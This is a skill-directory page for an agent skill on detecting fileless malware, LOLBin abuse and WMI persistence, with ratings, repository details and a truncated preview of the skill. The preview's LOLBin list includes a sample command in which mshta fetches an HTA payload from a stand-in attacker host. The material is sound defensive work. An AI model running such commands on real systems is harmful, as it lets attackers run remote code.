detecting-fileless-malware-techniques

Solid

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.

AI & Automation 38 stars 5 forks Updated yesterday MIT

Install

View on GitHub

Quality Score: 89/100

Stars 20%
53
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
80
License 10%
100
Description 5%
100

Skill Content

# Detecting Fileless Malware Techniques ## When to Use - EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32) - Investigating attacks that leave no traditional malware files on disk - Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence - Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments - Memory forensics reveals malicious code but no corresponding files exist on the filesystem **Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware. ## Prerequisites - Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes) - PowerShell Script Block Logging and Module Logging enabled - Volatility 3 for memory forensics of fileless malware artifacts - Process Monitor (ProcMon) for real-time system activity monitoring - Windows Event Log access with adequate retention policies - Autoruns for identifying persistence mechanisms ## Workflow ### Step 1: Identify LOLBin Usage Detect abuse of legitimate Windows binaries for malicious purposes: ``` Commonly Abused LOLBins and Detection Patterns: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ mshta.exe: Abuse: Execute HTA files with embedded VBScript/JScript Example: mshta http://evil.com/payload.hta Example: mshta vbscript:Execute("CreateObject(""WScript...

Details

Author
adriannoes
Repository
adriannoes/awesome-vibe-coding
Created
8 months ago
Last Updated
yesterday
Language
Jupyter Notebook
License
MIT

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Featured

detecting-fileless-malware-techniques

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.

15,448 Updated 1 weeks ago
mukul975
AI & Automation Featured

detecting-living-off-the-land-attacks

Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.

15,448 Updated 1 weeks ago
mukul975
AI & Automation Featured

detecting-fileless-attacks-on-endpoints

Detects fileless malware and in-memory attacks that execute entirely in RAM without writing persistent files to disk, evading traditional antivirus. Use when building detections for PowerShell-based attacks, reflective DLL injection, WMI persistence, and registry-resident malware. Activates for requests involving fileless malware detection, in-memory attacks, PowerShell exploitation, or living-off-the-land techniques.

15,448 Updated 1 weeks ago
mukul975